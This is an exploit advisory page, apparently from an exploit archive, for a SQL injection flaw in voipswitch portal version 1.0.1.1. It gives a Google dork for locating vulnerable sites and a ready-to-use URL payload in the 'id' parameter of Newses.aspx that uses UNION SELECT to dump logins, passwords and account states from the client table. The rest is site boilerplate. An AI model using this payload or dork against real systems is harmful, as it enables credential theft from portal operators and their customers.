voipswitch SQL Injection Vulnerability

2012.06.11
Credit: Sc4nX
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: [voipswitch portal v. 1.0.1.1

# Exploit Title: [voipswitch SQL Injection Vulnerability ] # Google Dork: [voipswitch portal v. 1.0.1.1] # Date: [11-06-2012] # Exploit Author: [Sc4nX] - sc4nx@yahoo.com # Software Link: [http://webtopicture.com/download/download-voipswitch-portal-....html] # Version: [v. 1.0.1.1] # Tested on: [win7] [+] Vulnerability http://host/portal/Sites/Newses/Newses.aspx?id=[vul] [+] Exploit http://host/portal/Sites/Newses/Newses.aspx?id=1%20%20union%20select%201,concat%28login,char%2858%29,password,char%2858%29,account_state%29,3,4,5%20from%20clientse164-- Gz : CodeZero - DarkMado - All Mmembers Sec4ever

References:

http://webtopicture.com/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top